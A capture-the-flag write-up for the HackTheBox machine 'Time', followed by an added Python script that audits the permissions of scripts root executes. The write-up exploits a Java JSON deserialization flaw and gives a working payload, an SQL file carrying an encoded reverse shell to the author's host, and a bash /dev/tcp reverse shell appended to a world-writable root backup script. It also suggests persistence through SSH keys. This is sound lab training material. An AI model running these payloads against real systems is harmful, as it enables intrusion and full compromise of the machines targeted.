
HackTheBox: Time


User

We start by checking which ports are open on the target:

[jusepe@nix:~/Documents/HackTheBox/Time]$ sudo scan time.htb
[sudo] password for jusepe: 
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 80,22
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 0
         Furious: 12
         Nmap: 9
         Total: 21

There is a website on port 80. After trying its functionality, it throws a Java exception while trying to parse the JSON, which looks like a possible attack vector:

Deserialization attack

There is a CVE for that specific library, so I followed this PoC to exploit it:

I created the inject.sql file and started a web server on my machine:

[jusepe@nix:~/Documents/HackTheBox/Time]$ cat inject.sql 
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODE4MSAwPiYxCg== | base64 -d | bash')
[jusepe@nix:~/Documents/HackTheBox/Time]$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
10.10.10.214 - - [19/Jan/2021 18:02:38] "GET /inject.sql HTTP/1.1" 200 -

Then I sent the following payload to the validator endpoint:

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.15.193:8000/inject.sql'"}]

Root

To check for processes running in the background, I used pspy:

pspy

There is an interesting process running with UID 0 (as root) that executes /usr/bin/timer_backup.sh, so I checked whether we had permission to read it:

(remote) pericles@time:/tmp$ ls -la /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Jan 19 18:35 /usr/bin/timer_backup.sh

We have write permission on it, so I added a reverse shell to it in order to get root:

(remote) pericles@time:/tmp$ cat /usr/bin/timer_backup.sh 
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip && bash -i >& /dev/tcp/10.10.15.193/9999 0>&1

Keep in mind that the process doesn't last long; to add persistence, you could add your SSH key to authorized_keys.
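The root vector above is a script that root executes on a timer but that an unprivileged user can modify. As an added example (my own code, not from the writeup), the following audit parses an ls -l permission string such as the one shown for /usr/bin/timer_backup.sh and can also stat live paths to flag scripts that root should not be running; the sample line is the page's own ls output, and the paths you feed audit_paths are assumed to come from root crontabs or systemd timers.

```python
# Audit scripts that a root cron job or systemd timer executes for permission
# bits that let an unprivileged user change them, the weakness behind
# /usr/bin/timer_backup.sh above. Added example, not part of the original writeup.
import os
import stat

SAMPLE_LS_LINE = "-rwxrw-rw- 1 pericles pericles 88 Jan 19 18:35 /usr/bin/timer_backup.sh"  # from the writeup

def parse_ls_mode(perm):
    """Turn an 'ls -l' permission string such as '-rwxrw-rw-' into st_mode bits
    (setuid/setgid/sticky markers honoured, the type character ignored)."""
    bits = 0
    special = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}
    for i, ch in enumerate(perm[1:10]):
        if ch in "rwxst":  # lowercase s/t also carry the execute bit
            bits |= 1 << (8 - i)
        if ch in "sStT":
            bits |= special[i]
        elif ch not in "rwx-":
            raise ValueError(f"bad permission char {ch!r} in {perm!r}")
    return bits

def check_perms(mode, owner_is_root):
    """Reasons a non-root user could modify a file that root executes."""
    issues = []
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    if mode & stat.S_IWGRP:
        issues.append("group-writable")
    if not owner_is_root:
        issues.append("not owned by root")
    return issues

def check_ls_line(line):
    """Check a pasted 'ls -l' line offline (fields: perms, links, owner, ...)."""
    fields = line.split()
    return check_perms(parse_ls_mode(fields[0]), fields[2] == "root")

def audit_paths(paths):
    """Stat each script on the live host; missing paths are flagged as well."""
    report = {}
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            report[path] = ["missing"]
            continue
        report[path] = check_perms(st.st_mode, st.st_uid == 0)
    return report
```

On the box above, check_ls_line(SAMPLE_LS_LINE) reports the script as world-writable, group-writable and not owned by root, which is exactly the combination that made the privilege escalation possible.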

Written by ITasahobby (InTernet lover)